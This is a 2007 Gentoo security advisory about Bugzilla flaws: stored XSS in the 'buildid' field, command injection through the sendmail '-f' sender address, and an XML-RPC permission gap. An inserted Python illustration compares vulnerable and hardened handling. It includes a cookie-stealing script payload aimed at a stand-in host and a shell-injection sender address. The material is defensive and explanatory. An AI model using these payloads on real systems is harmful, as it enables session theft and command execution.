Gentoo Archives: gentoo-announce

From: Raphael Marichez <falco@g.o>
To: gentoo-announce@g.o
Cc: bugtraq@×××××××××××××.com, full-disclosure@××××××××××××××.uk, security-alerts@×××××××××××××.com
Subject: [gentoo-announce] [ GLSA 200709-18 ] Bugzilla: Multiple vulnerabilities
Date: Sun, 30 Sep 2007 21:00:23
Message-Id: 20070930202317.GI10324@falco.falcal.net
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200709-18
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Severity: High
Title: Bugzilla: Multiple vulnerabilities
Date: September 30, 2007
Bugs: #190112
ID: 200709-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Bugzilla contains several vulnerabilities, some of them possibly
leading to the remote execution of arbitrary code.

Background
==========

Bugzilla is a web application designed to help with managing software
development.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  www-apps/bugzilla        < 3.0.1                       *>= 2.20.5
                                                            *>= 2.22.3
                                                              >= 3.0.1

Description
===========

Masahiro Yamada found that, since version 2.17.1, Bugzilla does not
properly sanitise the content of the "buildid" parameter when filing
bugs (CVE-2007-4543). The next two vulnerabilities only affect Bugzilla
2.23.3 or later, so the stable Gentoo Portage tree does not contain
them: Loic Minier reported that the "Email::Send::Sendmail()" function
does not properly sanitise the "from" email address before passing it
to the "-f" parameter of /usr/sbin/sendmail (CVE-2007-4538), and
Frédéric Buclin discovered that the XML-RPC interface does not correctly
check permissions on the time-tracking fields (CVE-2007-4539).

Impact
======

A remote attacker could trigger the "buildid" vulnerability by
submitting a specially crafted form to Bugzilla, leading to a persistent
XSS and thus allowing theft of credentials. With Bugzilla 2.23.3 or
later, an attacker could also execute arbitrary code with the
permissions of the web server by injecting a specially crafted "from"
email address, and gain access to normally restricted time-tracking
information through the XML-RPC service.
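As an added illustration of the two injection sinks named in the Description and Impact above (this is example code written for this page, not code from Bugzilla, Email::Send or the advisory): the same untrusted field written into an HTML page without escaping, and a sender address pasted into a shell command line for /usr/sbin/sendmail. The advisory does not say how Email::Send::Sendmail built its sendmail invocation; the vulnerable function below assumes the common pipe-open pattern of interpolating the address into a string handed to /bin/sh, which is one way an unsanitised "-f" value becomes command execution. It is written in Python because the pattern is language-independent; the addresses, the payloads, the hostnames and the markup snippet are all constructed for the example, and nothing here actually runs sendmail.

```python
import html
import re
import shlex

# Constructed sample inputs for the example; not values from the advisory.
BENIGN_FROM = "reporter@example.org"
MALICIOUS_FROM = "attacker@example.org; id > /tmp/pwned"
BENIGN_BUILDID = "2007092917"
MALICIOUS_BUILDID = (
    '<script>document.location="http://evil.example/?"+document.cookie</script>'
)

# Strict sender check: a bare local@domain from a safe character set. Nothing
# in this set is shell syntax, and the local part must start alphanumeric so
# the value can never begin with '-' and be mistaken for a command-line option.
_SENDER_RE = re.compile(
    r"^[A-Za-z0-9][A-Za-z0-9._%+-]*@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$"
)


def is_safe_sender(from_addr: str) -> bool:
    """True only if from_addr is shaped like a plain address (no shell metachars)."""
    return _SENDER_RE.fullmatch(from_addr) is not None


def vulnerable_sendmail_cmdline(from_addr: str) -> str:
    """Command string a naive pipe-open mailer would hand to /bin/sh.

    The address is pasted in verbatim, so ';', '|', '`', '$(...)' and
    redirections inside it are interpreted by the shell, not by sendmail.
    """
    return f"/usr/sbin/sendmail -i -f{from_addr} -t"


def shell_words(cmdline: str) -> list[str]:
    """Splits a command string into words the way /bin/sh would (on whitespace,
    honouring quotes), so an address that smuggled extra words becomes visible.
    """
    return shlex.split(cmdline)


def hardened_sendmail_argv(from_addr: str) -> list[str]:
    """Validates the sender and returns an argv list for exec without a shell.

    The address is exactly one argv element, so no shell ever parses it, and
    the whitelist check rejects anything that is not a plain address.
    """
    if not is_safe_sender(from_addr):
        raise ValueError(f"refusing unsafe sender address: {from_addr!r}")
    return ["/usr/sbin/sendmail", "-i", "-f" + from_addr, "-t"]


def vulnerable_render_buildid(buildid: str) -> str:
    """Stored value echoed into a (hypothetical) bug page as-is: a persistent
    XSS sink, since whatever was submitted is served to every later viewer."""
    return f"<td>Build Identifier: {buildid}</td>"


def hardened_render_buildid(buildid: str) -> str:
    """Same field, HTML-escaped for an element-text context; quote=True also
    covers the attribute-value context at no cost."""
    return f"<td>Build Identifier: {html.escape(buildid, quote=True)}</td>"


if __name__ == "__main__":
    # The injected 'id' shows up as its own shell word in the vulnerable path.
    print(shell_words(vulnerable_sendmail_cmdline(MALICIOUS_FROM)))
    print(hardened_sendmail_argv(BENIGN_FROM))
    print(is_safe_sender(MALICIOUS_FROM))
    print(hardened_render_buildid(MALICIOUS_BUILDID))
```

The point of shell_words is to make the failure visible rather than to run it: once the address contains a ';', the shell sees "id" and the redirection as separate commands, whereas the argv form keeps the whole address inside one element and the validator refuses it before anything is executed. The escape step is the same idea for the HTML sink: the browser must never be able to read the stored value as markup.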

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Bugzilla users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose www-apps/bugzilla

References
==========

  [ 1 ] CVE-2007-4538
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4538
  [ 2 ] CVE-2007-4539
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4539
  [ 3 ] CVE-2007-4543
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4543

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200709-18.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@g.o or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5